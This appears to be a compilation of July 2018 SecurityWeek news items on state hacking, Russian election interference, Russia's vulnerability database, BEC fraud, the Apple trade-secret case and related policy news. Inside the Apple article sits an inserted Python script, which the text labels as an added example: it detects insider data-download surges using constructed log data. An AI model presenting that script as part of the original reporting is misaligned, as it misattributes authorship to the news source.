Russia’s national vulnerability database is slow and incomplete, and it focuses on security flaws that could pose a threat to the country’s IT systems, according to an analysis conducted by threat intelligence firm Recorded Future.

After analyzing the national vulnerability databases of the United States and China, Recorded Future has decided to take a look at Russia’s database, known as the BDU. The BDU is maintained by the Federal Service for Technical and Export Control of Russia (FSTEC), an agency whose role is to protect state secrets and provide support for counterespionage and counterintelligence missions.

Researchers discovered significant differences both in the number of vulnerabilities and the time it takes to add them to the database, compared to the databases run by China and the United States. For instance, while the US’s NVD stored information on nearly 108,000 security holes, the BDU only documented just over 11,000 flaws in March, when Recorded Future conducted its analysis.

As for the time it takes for a vulnerability to be included in the BDU, the average is 95 days, much more than in the United States (45 days) and China (11 days).

While Russia’s database only covers roughly 10 percent of known vulnerabilities, there are certain pieces of software and certain types of bugs that seem more important to the maintainers of the database.

Software vulnerabilities covered above average in Russia's national vulnerability database

Researchers noticed that the BDU stores information on 61 percent of the vulnerabilities known to have been exploited by Russia-linked advanced persistent threat (APT) groups in their campaigns. This is in contrast to China, whose CNNVD database hides or delays flaws exploited by the country’s intelligence services.

While the vulnerabilities exploited by Russia-linked APTs affect some of the world’s most widely used software, their presence in the vulnerability database suggests that the systems of the Russian government also run these programs, especially since FSTEC’s mission is to protect government systems. This also provides insight into the applications used by the Russian government.

Moreover, Recorded Future points out it’s also possible that hackers sponsored by the Russian military leverage vulnerabilities in the BDU in their operations, or that the military may be obligated to protect the state’s IT systems by providing information on these flaws.

“The public record and available data is not yet sufficient to determine the relationship between FSTEC and Russian state-sponsored cyber operations,” Recorded Future said in its report.

On the other hand, while the BDU covers many vulnerabilities affecting Adobe products, even in this category the database is incomplete. According to researchers, there are over 1,200 Adobe bugs with a CVSS score higher than 8 that are not present in Russia’s database.

So why waste resources on an incomplete and very slow vulnerability database?

A lack of resources could be an explanation, but analysts note that FSTEC has over 1,100 employees, nearly triple compared to the US’s NIST Information Technology Laboratory (ITL), which maintains the country’s NVD.

Another possible scenario is that FSTEC has both an offensive and a defensive mission and its database covers vulnerabilities based on competing needs. However, experts believe this theory is not accurate either, considering that the agency is not a public service organization: its main mission is to protect state and critical infrastructure systems and support counterintelligence initiatives.

The most likely scenario, Recorded Future believes, is that the BDU is “simply a baseline for government information systems security and software inspections.”

One of the roles of FSTEC is to review the software of foreign companies that want to sell their products in Russia. This includes firewalls, antiviruses and applications that use encryption.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” the threat intelligence firm said.

North Korean Hackers Launch New ActiveX Attacks
19.7.2018 securityweek BigBrothers

Watering Hole Attacks Target South Korean Users With ActiveX Exploits

A new series of reconnaissance attacks targeting ActiveX objects has been associated with the North Korean-linked Andariel group, a known branch of the notorious Lazarus Group.

In May, the group was observed exploiting an ActiveX zero-day vulnerability in a series of attacks on South Korean targets, mainly for reconnaissance purposes. A script injected into compromised websites would identify the visitors’ operating system and browser and, if Internet Explorer was detected, check for ActiveX and running plugins from a specific list of ActiveX components.

Highly active in recent months, the Andariel group has apparently launched a new reconnaissance attack against South Korean targets, by injecting their code into four other compromised websites. The attack, which was spotted on June 21, attempts to collect different object information than before.

Despite targeting objects it wasn’t targeting before, the newly discovered script is similar to the one used in May, which led Trend Micro to the conclusion that the same group of hackers is behind both campaigns.

Previously, the group collected targeted ActiveX objects on users’ Internet Explorer browser and only launched the zero-day exploit after identifying the right targets.

“Based on this, we believe it’s likely that the new targeted ActiveX objects we found could be their next targets for a watering hole exploit attack,” Trend Micro explains.

The new attack lasted until June 27 and targeted the visitors of a Korean non-profit organization’s website and those of three South Korean local government labor union websites.

The injected script, which had similar obfuscation and structure as the Andariel-linked script found in May, was designed to collect visitor information such as browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects.

According to Trend Micro, the script was attempting to detect two additional ActiveX objects that were not previously targeted, namely one related to a DRM (Digital Rights Management) software from a South Korean Document Protection Security vendor and another related to a South Korea-based voice conversion software company.

The script also included code to open a websocket connection to localhost. “The voice conversion software has websocket service listening on the local host so the injected script can detect the software by checking if they can establish a connection to ports 45461 and 45462, which the software uses,” Trend Micro explains.

The websocket verification, the security researchers say, could also be performed on Chrome and Firefox, in addition to Internet Explorer, which would suggest that the hackers have expanded their target base, aiming at the software and not just the ActiveX objects.

“Based on this change, we can expect them to start using attack vectors other than ActiveX,” Trend Micro notes.

At Summit, Trump Refuses to Confront Putin on Vote Row
19.7.2018 securityweek BigBrothers

President Donald Trump refused to confront Vladimir Putin over meddling in the US election at their first face-to-face summit, publicly challenging the findings of the US intelligence community and triggering bipartisan outrage at home.

The US and Russian presidents came out of their meeting in Helsinki Monday expressing desire for a fresh start between the world's leading nuclear powers and more talk on global challenges, after discussing an array of issues from Syria, Ukraine and China to trade tariffs and the size of their nuclear arsenals.

There were indications of an arrangement to work together and with Israel to support a ceasefire in southern Syria, suggesting that the US administration is backing off its demand that Moscow's ally Bashar al-Assad step down.

If that is anathema to many in Washington, Trump's apparent concessions to Putin over the election controversy drew stinging condemnation from across the political divide.

Standing alongside the Kremlin boss at a joint news conference, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Hillary Clinton in 2016.

But, insisting he had won the race fair and square, the wealthy property tycoon said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Friday's US indictment of 12 Russian military intelligence agents exploded with embarrassing timing for Trump as he prepared to meet Putin. On Monday, officials said another Russian agent had been arrested for seeking to influence US politics.

But the US leader insisted that his counterpart had delivered a "powerful" denial of any Russian manipulation, and that the investigation by special counsel Robert Mueller was proving a "disaster" for the United States.

In his own interview with Fox, Trump said he was "fascinated" by an offer from Putin for US agents to indirectly grill the indicted Russians by submitting their questions to Russian officials but said Mueller's team "probably won't want to go" to Moscow.

- 'Never interfered' -

Trump again denied any collusion between his campaign and the Kremlin, while Putin insisted: "The Russian state has never interfered and is not planning to interfere in the USA's internal affairs."

As criticism mounted, Trump tweeted from Air Force One on his way home from Finland that he had "GREAT confidence in MY intelligence people".

"However, I also recognize that in order to build a brighter future, we cannot exclusively focus on the past – as the world’s two largest nuclear powers, we must get along."

Angry criticism of his disavowal of his own intelligence agencies came even from within Trump's Republican Party.

Senior Republican Senator John McCain was particularly scathing, saying: "Coming close on the heels of President Trump's bombastic and erratic conduct towards our closest friends and allies in Brussels and Britain, today's press conference marks a recent low point in the history of the American presidency."

Director of National Intelligence Dan Coats distanced himself from his boss, issuing a statement saying the US intelligence community's judgment that Russia interfered in the 2016 election was "clear".

But the top Democrat in the US Senate, Chuck Schumer, tweeted that many Americans can only wonder if "the only possible explanation for this dangerous behaviour is the possibility that President Putin holds damaging information over President Trump."

And former CIA director John Brennan said Trump's behavior at the news conference "rises to & exceeds the threshold of 'high crimes & misdemeanors.' It was nothing short of treasonous."

Putin denied the notion that Russian spy bosses may hold compromising information on Trump, who in his previous business career oversaw the Miss Universe pageant in Moscow in 2013.

"Please get this rubbish out of your heads," the Russian leader said.

In a post-summit interview with Fox News, Putin said US-Russia relations should not be held "hostage" to "internal political games," referring to the Mueller probe.

The two leaders appeared relaxed at the Helsinki news conference, smiling on occasion, in contrast to their sombre demeanour at the start of the day.

Trump, bent on forging a personal bond with the Kremlin chief despite the election allegations, went into the summit blaming the "stupidity" of his predecessors for plunging ties to their present low.

His manner towards Putin was also a contrast to the anger Trump flashed at NATO allies at a combative summit of the alliance in Brussels last week, which critics said would only hearten Putin.

- 'Only the beginning' -

A post-NATO trip to Britain, supposedly America's partner in a "special relationship", was riddled with controversy as well.

In Helsinki, however, Trump was determined to accentuate the positive, as was Putin.

The two leaders met one-on-one for more than two hours, with just their interpreters present, before they were joined by their national security teams.

Many in Washington were agog at Trump's decision to sit alone with Putin, worried about what he might give away to the former KGB spymaster, after previously cosying up to the autocratic leaders of China and North Korea.

But Trump, convinced his unique brand of diplomacy can win over Putin, pressed ahead and looked forward to "having an extraordinary relationship" as the pair sat down to discuss global hotspots.

- 'Foolishness and stupidity' -

Trump began the day by firing a Twitter broadside at his domestic opponents, blaming the diplomatic chill on the election investigation.

"Our relationship with Russia has NEVER been worse thanks to many years of U.S. foolishness and stupidity and now, the Rigged Witch Hunt!" Trump tweeted.

Russia's foreign ministry tweeted in response: "We agree."

In a weekend interview with CBS News, Trump admitted that Russia remains a foe, but he put Moscow on a par with China and the European Union as economic and diplomatic rivals.

Irish Silk Road Suspect Extradited to US: Prosecutors
19.7.2018 securityweek BigBrothers

A 30-year-old Irish man accused of working for now defunct "dark web" marketplace Silk Road has been extradited to the United States to face charges in New York, four years after his arrest, prosecutors announced Friday.

Gary Davis, who went by the alias "Libertas," was allegedly a Silk Road administrator in 2013 -- and was paid a weekly salary to carry out duties that included resolving disputes between drug dealers and buyers on the site.

He is charged with one count of conspiracy to distribute narcotics, which carries a maximum sentence of life in prison, one count of conspiracy to commit computer intrusion and one count of conspiracy to commit money laundering.

The Wicklow man, who was arrested in January 2014, appeared before a Manhattan federal court on Friday.

"Thanks to our partner agencies here and abroad, Davis now faces justice in an American court," said Manhattan US Attorney Geoffrey Berman.

Until the FBI shut it down in October 2013, the US government called Silk Road "the most sophisticated and extensive criminal marketplace on the Internet" used by vendors in more than 10 countries in North America and Europe.

Texan mastermind Ross Ulbricht was convicted and sentenced to life in prison in 2015 for running the online enterprise that sold $200 million in drugs worldwide.

Operating under the alias "Dread Pirate Roberts," Ulbricht amassed $13 million in commissions by making the purchase of heroin, cocaine and crystal meth as easy as shopping online at eBay or Amazon, the government said.

His four-week trial was considered a landmark case in the murky world of online crime and government surveillance.

Back in Washington, Trump Under Pressure to Reverse Course on Russia
19.7.2018 securityweek BigBrothers

President Donald Trump found himself isolated and under pressure to reverse course Tuesday after publicly challenging the US intelligence conclusion that Russia meddled in the 2016 election during his face-to-face with Vladimir Putin.

At his inaugural summit with the Russian president in Finland, Trump appeared to accept at face value the strongman's denial that Moscow interfered in a bid to undermine the Democrat Hillary Clinton -- a stance that triggered bipartisan outrage at home.

Back in Washington, Trump sounded a defensive note, insisting his meeting with Putin had been "even better" than his one last week with traditional allies NATO -- a testy gathering seen as having badly strained trans-Atlantic ties.

But the US president -- who is expected to speak about the meeting at 2:00 pm (1800 GMT) on Tuesday -- has found precious little support for his decision not to confront Putin, and faced calls even from allies to change tack.

"He has to reverse course immediately and he's gotta get out there as soon as possible before the concrete starts to set on this," former White House communications director Anthony Scaramucci said on CNN.

"Loyalty right now requires you to tell the truth and sit with him and explain to him the optics of the situation, why the optics are bad, the strategy in terms of trying to get along with Vladimir Putin and deploying a strategy of going against the intelligence agency is very bad," Scaramucci said.

Former House speaker and longtime Trump ally Newt Gingrich put it yet more bluntly.

"President Trump must clarify his statements in Helsinki on our intelligence system and Putin," he tweeted as Trump headed home. "It is the most serious mistake of his presidency and must be corrected -- immediately.

Trump's performance at the summit has even come under fire from the hosts at Fox News, usually a reliable defender of the president.

"No negotiation is worth throwing your own people and country under the bus," Fox anchor and Fox & Friends co-host Abby Huntsman -- the daughter of the US ambassador to Russia -- wrote on Twitter.

And former president Barack Obama, who has remained above the political fray since leaving office, appeared to allude to the events of the day before during a rare public appearance Tuesday at which he warned the world had plunged into "strange and uncertain times."

"Strongman politics are ascendant, suddenly, whereby elections and some pretense of democracy are maintained -- the form of it -- but those in power seek to undermine every institution or norm that gives democracy meaning," Obama said in Johannesburg.

- 'Undermine democracy' -

Trump and Putin met for two hours in Helsinki on Monday with only their interpreters present, then held a joint press conference.

Standing alongside the Kremlin boss, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Clinton in 2016.

But, insisting he had won the race fair and square, the Republican said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Special Counsel Robert Mueller's investigation into Russian meddling and possible collusion with the Trump campaign has increasingly put pressure on the White House, and the president -- who regards it as an attack on his legitimacy -- has dubbed it a "witch hunt."

But the investigation continues to progress, resulting in the indictment of 12 Russian military intelligence agents on Friday -- timing that was embarrassing in light of the upcoming summit.

While Trump has faced intense criticism over Helsinki, he is not entirely without defenders.

Republican Senator Rand Paul has given a series of interviews supporting Trump's stance towards Putin, and berating his critics as biased.

"I think the president did a good thing by meeting with Putin and I think it's a mistake for people to try to turn this into a partisan escapade," the Kentucky Republican said on CBS.

Paul's efforts drew praise from Trump, who tweeted: "Thank you @RandPaul, you really get it!"

But the bipartisan consensus has been broadly hostile to Trump's stance -- as the top Republican in Congress, House Speaker Paul Ryan made clear once more at a press conference Tuesday on Capitol Hill.

"We stand by our NATO allies and all those countries who are facing Russian aggression," Ryan said. "Vladimir Putin does not share our interests, Vladimir Putin does not share our values."

"We just conducted a yearlong investigation into Russia's interference in our elections. They did interfere in our elections. It's really clear. There should be no doubt about that," he said.

"Russia is trying to undermine democracy itself."

NIST to Withdraw 11 Outdated Cybersecurity Publications
19.7.2018 securityweek BigBrothers

The U.S. National Institute of Standards and Technology (NIST) announced on Tuesday that its Computer Security Division has decided to withdraw eleven outdated SP 800 publications.

NIST’s 800 series Special Publications (SP) focus on cybersecurity and include guidelines, technical specifications, recommendations, and annual reports. These publications are meant to address and support the security and privacy needs of government agencies, but they are often used and referenced by private sector companies.

NIST’s website currently lists over 180 SP 800 publications, including drafts and final versions. Eleven of them, which are now considered out of date, will be withdrawn on August 1, 2018, and will not be revised or superseded.

The documents will still be available for historical reference, but their status will be changed from “final” to “withdrawn.”

The following SP 800 publications will be withdrawn, with the reason for withdrawal listed for each document:

● SP 800-13 (October 1995): Telecommunications Security Guidelines for Telecommunications Management Network – describes outdated technologies;

● SP 800-17 (February 1998): Modes of Operation Validation System (MOVS): Requirements and Procedures – validation system is for deprecated algorithms, such as DES and Skipjack;

● SP 800-19 (October 1999): Mobile Agent Security – environments and technologies far less complex than what is used today;

● SP 800-23 (August 2000): Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products – based on outdated laws, regulations and executive directives;

● SP 800-24 (April 2001): PBX Vulnerability Analysis: Finding Holes in Your PBX Before Someone Else Does – does not address newer technologies, such as VOIP;

● SP 800-33 (December 2001): Underlying Technical Models for Information Technology Security – describes a model that pre-dates the Risk Management Framework and Cybersecurity Framework;

● SP 800-36 (October 2003): Guide to Selecting Information Technology Security Products – outdated references and it does not reflect current types of security products;

● SP 800-43 (November 2002): Systems Administration Guidance for Securing Windows 2000 Professional System – Windows 2000 no longer supported;

● SP 800-65 (January 2005): Integrating IT Security into the Capital Planning and Investment Control Process – pre-dates the Cybersecurity Framework and other important SP 800 guidance;

● SP 800-68 Rev. 1 (October 2008): Guide to Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist – Windows XP no longer supported;

● SP 800-69 (September 2006): Guidance for Securing Microsoft Windows XP Home Edition: A NIST Security Configuration Checklist – Windows XP no longer supported.

US Lifts Export Ban on Suppliers to China's ZTE
18.7.2018 securityweek  BigBrothers

The United States on Friday formally lifted a crippling ban on exports to China's ZTE, rescuing the smartphone maker from the brink of collapse after it was denied key components.

The US Commerce Department said it would continue to monitor the company to prevent further violations of US sanctions on Iran and North Korea.

"While we lifted the ban on ZTE, the Department will remain vigilant as we closely monitor ZTE's actions to ensure compliance with all US laws and regulations," Commerce Secretary Wilbur Ross said in a statement.

But the move to reverse the harsh penalties, made at President Donald Trump's insistence, has left US lawmakers irate. Congress has taken steps to keep the ban in place and accused Trump of rewarding a company which had repeatedly flouted American law, lied to authorities and engaged in espionage.

The about-face to rescue the company created a stark contrast with the escalating trade war between Washington and Beijing.

The Commerce Department in April banned US companies from supplying ZTE with crucial components, forcing it to halt operations, after officials found further violations even after reaching a settlement in March of last year over the initial complaints.

The company had paid bonuses rather than reprimanding employees involved in illegal activity and created an "elaborate scheme" to deceive US officials and obstruct justice, US officials said.

But as a favor to Chinese President Xi Jinping, Trump ordered Commerce to ease the penalties on ZTE.

In an agreement struck last month, Washington agreed to lift the export ban if ZTE paid an additional $1 billion fine -- beyond the $892 million penalty imposed in 2017.

The company also was required to replace its board of directors, retain outside monitors and put $400 million in escrow to cover any future violations -- a final step it took this week.

In a statement this week, Senator Mark Warner of Virginia, the senior Democrat on the Select Committee on Intelligence, lambasted the reversal, saying the US military and spy agencies had branded ZTE an "ongoing threat" to US national security.

"This sweetheart deal not only ignores these serious issues, it lets ZTE off the hook for evading sanctions against Iran and North Korea with a slap on the wrist," Warner said.

BEC Scam Losses Top $12 Billion: FBI
18.7.2018 securityweek  BigBrothers

The losses and potential losses reported as a result of business email compromise (BEC) and email account compromise (EAC) scams exceed $12 billion globally, according to an alert published last week by the FBI.

The report is based on data collected by the FBI’s Internet Crime Complaint Center (IC3), international law enforcement and financial institutions between October 2013 and May 2018. The amounts represent both money that was actually lost by victims and money they could have lost had they taken the bait.

BEC scams, which involve sending requests for fund transfers and personally identifiable information from hijacked business email accounts, have been observed in 50 U.S. states and 150 countries, with money being sent to 115 countries.

The top destinations for money generated by BEC scams are Asian banks in China and Hong Kong, but a significant number of schemes involve financial organizations in the U.K., Mexico and Turkey.

According to the FBI, more than 78,000 complaints were made globally between October 2013 and May 2018, with over 41,000 victims reported in the United States. Targeted individuals and businesses lost or could have lost $12.5 billion, nearly $3 billion of it in the U.S. Losses increased by 136% between December 2016 and May 2018.

The number of non-U.S. victims known to the FBI is 2,565, with losses totaling over $670 million.

In comparison, the FBI’s previous report on BEC scams, which covered the period between October 2013 and December 2016, said there had been 40,203 incidents globally with exposed losses totaling over $5.3 billion.

In its recent 2017 Internet Crime Report, the FBI said IC3 received over 15,000 BEC and EAC complaints last year, reporting losses of $675 million.

The law enforcement agency highlighted that the real estate sector continues to be increasingly targeted. Victims include law firms, title companies, real estate agents, sellers, and buyers.

In scams targeting this sector, the fraudsters use spoofed emails on behalf of real estate transaction participants and instruct recipients to transfer money into fraudulent accounts.

“Based on victim complaint data, BEC/EAC scams targeting the real estate sector are on the rise,” the FBI said. “From calendar year 2015 to calendar year 2017, there was over an 1100% rise in the number of BEC/EAC victims reporting the real estate transaction angle and an almost 2200% rise in the reported monetary loss. May 2018 reported the highest number of BEC/EAC real estate victims since 2015, and September 2017 reported the highest victim loss.”

BEC scam losses in real estate sector

The topic of BEC scams and how the threat can be prevented using human-powered intelligence was covered recently in a SecurityWeek column by Josh Lefkowitz, CEO of business risk intelligence firm Flashpoint.

“BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat,” Lefkowitz said.

12 Russian Intelligence Officers Indicted for Hacking U.S. Democrats
18.7.2018 securityweek  BigBrothers

Twelve Russian intelligence officers were indicted by a US grand jury on Friday -- just three days before President Donald Trump is scheduled to meet with Russia's Vladimir Putin -- for interfering in the November 2016 presidential election.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the 2016 vote and whether any members of Trump's campaign colluded with Moscow.

The indictment accuses members of Russia's military intelligence agency known as the GRU of carrying out "large-scale cyber operations" to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein, who announced the indictment at a press conference in Washington, said "there's no allegation in this indictment that any American citizen committed a crime."

Rosenstein said "the conspirators corresponded with several Americans during the course of the conspiracy through the internet."

However, "there's no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers," he said.

Rosenstein also stressed that "there's no allegation that the conspiracy changed the vote count or affected any election result."

Rosenstein said he briefed Trump about the indictment before Friday's announcement and that the timing was determined by "the facts, the evidence, and the law."

The deputy attorney general's press conference came as Trump was meeting Queen Elizabeth II and just three days before his meeting with Putin in Helsinki.

- Calls to cancel Putin meeting -

Senator Chuck Schumer, the Democratic Senate minority leader, immediately called on Trump to cancel the Putin talks.

"These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win," Schumer said in a statement.

"President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won't interfere in future elections," he said.

Speaking earlier Friday, before the indictments were announced, Trump said he would ask Putin about the allegations of Russian election meddling.

"I will absolutely, firmly ask the question, and hopefully we'll have a good relationship with Russia," he told a joint press conference with British Prime Minister Theresa May.

But he simultaneously denounced the Mueller investigation as a "rigged witch hunt," and said he has been "tougher on Russia than anybody."

"We have been extremely tough on Russia," Trump said.

The US president recalled that 60 intelligence officers were expelled from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

Russia has denied any involvement in the attack and rejected accusations that it interfered in the US presidential election in a bid to bring about the defeat of Democrat Hillary Clinton.

Rosenstein said 11 of the Russians indicted Friday were charged with "conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.

"One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections," he added.

"The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016," the deputy attorney general said.

"They also hacked into the computer networks of a congressional campaign committee and a national political committee."

Departing Apple Engineer Stole Autonomous Car Tech: FBI
18.7.2018 securityweek  BigBrothers

An ex-Apple engineer on Monday was charged with stealing secrets from a hush-hush self-driving car technology project days before he quit to go to a Chinese startup.

Xiaolang Zhang was in custody for stealing trade secrets from the Apple project, according to a copy of the criminal complaint posted online.

The charge is punishable by 10 years in prison and a $250,000 fine.

"Apple takes confidentiality and the protection of our intellectual property very seriously," the California-based internet titan said in response to an AFP query.

"We're working with authorities on this matter and will do everything possible to make sure this individual and any other individuals involved are held accountable for their actions."

Zhang was hired by Apple in December of 2015 to be part of a team developing hardware and software for self-driving vehicles, a project that was a "closely-guarded secret," according to the complaint filed by the FBI.

Zhang took paternity leave in the month of April, going with his family to China.

Upon his return to Apple at the end of April, he told a supervisor he was quitting to return to China to be near his ailing mother.

Zhang mentioned he planned to go work for a Chinese self-driving vehicle startup called Xiaopeng Motors, or XMotors, in Guangzhou, according to the complaint.

The supervisor thought Zhang "evasive" and brought in an Apple product security team, which had Zhang turn in all company devices and walked him off campus, according to the filing.

Apple security found that Zhang's activity on the company network surged "exponentially" in the days before he returned from paternity leave.

Zhang did searches of confidential databases, and downloaded technical files, the criminal complaint said.

Documents downloaded by Zhang included some on topics such as "prototypes," according to the case against him.
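The observation that a departing employee's network activity surged in the days before leaving is the classic insider-threat signal a defender would want to detect automatically rather than find after the fact. The block below is an added example, not code from the article or from Apple: it assumes a simple constructed audit-log format of `YYYY-MM-DD user action object` and compares each user's daily event count against that user's own median from earlier days. Real DLP or audit formats and thresholds will differ.

```python
"""Flag a sudden surge in a user's data-access activity relative to that
user's own baseline (added example; constructed log format and data)."""
from collections import Counter, defaultdict
from datetime import date, timedelta
from statistics import median


def build_sample_log():
    """Construct sample audit lines (not real data): user u1 performs 1-3
    downloads per day for two weeks and then 41 events in a single day;
    user u2 stays at one download per day throughout."""
    lines = []
    start = date(2018, 4, 10)
    for i in range(14):
        day = start + timedelta(days=i)
        for n in range(1 + i % 3):
            lines.append(f"{day} u1 download docs/spec-{i}-{n}.pdf")
        lines.append(f"{day} u2 download docs/report-{i}.pdf")
    burst = start + timedelta(days=14)
    for n in range(40):
        lines.append(f"{burst} u1 download confidential/prototype-{n}.pdf")
    lines.append(f"{burst} u1 search confidential-db prototype")
    lines.append(f"{burst} u2 download docs/report-14.pdf")
    return "\n".join(lines)


def parse_log(text):
    """Return {user: Counter{day: event_count}} from
    'YYYY-MM-DD user action object' lines; malformed lines are skipped."""
    counts = defaultdict(Counter)
    for line in text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 3:
            continue
        day, user = parts[0], parts[1]
        counts[user][date.fromisoformat(day)] += 1
    return counts


def surge_days(daily, factor=5.0, min_events=10, min_history=5):
    """Return [(day, count, baseline)] for days on which the user's event
    count is at least `min_events` and more than `factor` times the median
    of all earlier days. Nothing is flagged until `min_history` days of
    history exist, so a brand-new account does not trip the rule."""
    flagged, history = [], []
    for day in sorted(daily):
        n = daily[day]
        if len(history) >= min_history:
            baseline = median(history)
            if n >= min_events and n > factor * max(baseline, 1):
                flagged.append((day, n, baseline))
        history.append(n)
    return flagged


def surging_users(text, **thresholds):
    """Map each user with at least one flagged day to that user's flags."""
    result = {}
    for user, daily in parse_log(text).items():
        flags = surge_days(daily, **thresholds)
        if flags:
            result[user] = flags
    return result


if __name__ == "__main__":
    for user, flags in surging_users(build_sample_log()).items():
        for day, n, baseline in flags:
            print(f"{user}: {n} events on {day} (baseline median {baseline})")
```

The per-user median baseline matters: a global threshold would either miss a normally quiet engineer who jumps to forty downloads or drown in alerts from users whose job is bulk retrieval. Pairing the count rule with a second signal from the same log (here, searches of a confidential database) is what turns the alert into something a product-security team would act on.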

Apple also had closed-circuit camera recording of Zhang going into autonomous driving tech team labs late on a Saturday night while he was on paternity leave, according to the filing.

Zhang later admitted to taking circuit boards and a Linux server from the hardware lab, and to transferring some Apple files to his wife's computer, the FBI said in the complaint.

Zhang was "voluntarily terminated" from Apple in early March, and FBI agents searched his home in June as part of their investigation.

Zhang told the FBI at that time he was working at XMotors offices in Silicon Valley, according to the complaint.

Zhang was heading to China with a "last-minute round-trip ticket" when FBI agents arrested him at an airport in the Silicon Valley city of San Jose, the filing said.

Outdated DoD IT Jeopardizes National Security: Report
18.7.2018 securityweek  BigBrothers

Failure to Modernize Legacy DoD Systems is Putting U.S. National Security in Jeopardy, Report Claims

In a new study titled 'Innovation Imperative: The Drive to Modernize DoD', Meritalk queried 150 federal IT managers working in Department of Defense (DoD) organizations. The stated objective was "to understand the state of their IT infrastructure and applications." This was to include levels of satisfaction, an indication of where missions are being met or missed, and what should be done next.

In fact, this report is solely about DoD IT managers' attitude towards cloud migration -- which is perhaps unsurprising since the survey was underwritten by AWS and Red Hat.

The results confirm a strong belief that cloud is the way forward -- and perhaps the only way for the U.S. military to maintain an advantage over the world's other superpowers: China and increasingly Russia. For example, 80% of the respondents say the DoD needs to improve the use of cloud to maintain the military’s technical advantage and support mission success; and 81% say accelerating DoD’s adoption of cloud is critical.

86% of respondents said that failing to modernize legacy DoD systems is putting U.S. national security in jeopardy.

The increasing use of artificial intelligence and big data analytics by the military, the need for more efficient data sharing between agencies, and the power to transcribe and translate massive amounts of recorded voice in almost real time can only be served by the power and flexibility of the cloud.

Respondents to the survey specifically see DoD cloud adoption important for big data analytics (85%), electronic warfare (83%), shared services (82%), DevOps (81%), AI (77%), IoT (73%), machine learning (72%) and blockchain (61%). But this understanding is not new to the DoD.

The Joint Enterprise Defense Infrastructure (JEDI) initiative is a plan for the DoD to acquire its own commercial cloud infrastructure suitable to hold DoD data at all classification levels, and available to any organization in DoD. It is a massive project spread over a ten-year ordering period, and thought to have a budget of around $10 billion over that timeframe.

It is believed that the DoD's preference is to award the project to a single provider; and it is equally believed that AWS is the frontrunner. Smaller existing cloud providers would lose out, and have been lobbying for a multi-provider approach. Microsoft, Google and IBM are also rumored to be interested in bidding for the project.

There is little mention of JEDI within the Meritalk survey. However, 51% of the respondents said they believe that a single-vendor cloud solution has more pros than cons. Sixty-three percent said that talk about JEDI has had "a positive impact on the pace of their organization’s IT modernization efforts"; and "72% feel utilizing multiple cloud vendors would increase the complexity of their organization’s system integrations."

The Meritalk survey, underwritten by AWS and Red Hat, offers strong support for the DoD's single supplier JEDI preference, where AWS (most probably backed by Red Hat software) is the frontrunner.

But regardless of who wins the JEDI provider contract, the survey also demonstrates that DoD IT managers are ready to increase their migration to the cloud. More than 50% of the respondents would recommend moving 50% of their current data to the cloud (13% would move 'the vast majority' of their data). They are unlikely -- and in some cases for reasons of national security unable -- to adopt a cloud-only strategy.

This will set the DoD on a path directly parallel to that faced by commercial enterprises today -- to what extent should existing infrastructures and data be migrated to the cloud, how can it be achieved, and how do you secure it. The only primary difference is that DoD already knows which cloud; that is, the JEDI cloud.

"The survey shows that the interest and promise of the cloud is well recognized, but the DoD would benefit from the lessons being learned right now by large private enterprises going through the same processes," Ken Spinner, VP of field engineering at Varonis told SecurityWeek. "Private industry, which is often recognized for its agility and embrace of new technologies, still largely works with a hybrid mix of cloud and on-premises systems and storage."

"One thing is certain," agrees Rick Moy, head of marketing at Acalvio: "hybrid networks, or cloud and on-premises." Both agree that adoption of JEDI -- or any other cloud solution -- will present the DoD organizations with both challenges and opportunities.

"There’s no easy button and the cloud is not without risks," says Spinner. "Another concern, and perhaps the weakest link, are the defense contractors that access confidential intelligence as part of their daily workload. It’s far too tempting for a few bad actors to breach a system and attempt to steal data -- the cloud needs to be protected just like on-premises systems and data. Another challenge will be to ensure that the security capabilities people currently have with on-prem solutions are available and tested with both pure cloud solutions and hybrid solutions."

But Moy adds the possibility of 'starting over'. "I would argue that a move to cloud represents a fresh opportunity to build in better security and advanced monitoring capabilities," he told SecurityWeek: "ones that we may have overlooked in on-premises deployments. For instance, unified policy, access controls, deception, logging and monitoring, and so on."

The JEDI project shows that the DoD hierarchy is already set on a cloud future; and the Meritalk survey shows that individual DoD IT managers are ready for the challenge. "As DoD knows," concludes the Meritalk report, "cloud isn’t the final destination -- but it sets the foundation for necessary innovation, collaboration, and next-generation technologies like big data analytics, shared services, AI, and electronic warfare. Agencies must keep their eyes on the future and consider cloud in terms of broader IT modernization efforts government-wide."

Fitness App Revealed Data on Military, Intelligence Personnel
12.7.2018 securityweek  BigBrothers

Mobile fitness app Polar has suspended its location tracking feature after security researchers found it had revealed sensitive data on military and intelligence personnel from 69 countries.

The revelation about the Finnish company's Polar Flow app comes months after another health app, Strava, was found to have shown potentially sensitive information about US and allied forces around the world.

Security researchers in the Netherlands said Sunday they were able to find data on some 6,000 individuals including military personnel from dozens of countries and employees of the FBI and National Security Agency.

The disclosure illustrates the potential security risks of using fitness apps which can track a person's location, and which may be "scraped" for espionage.

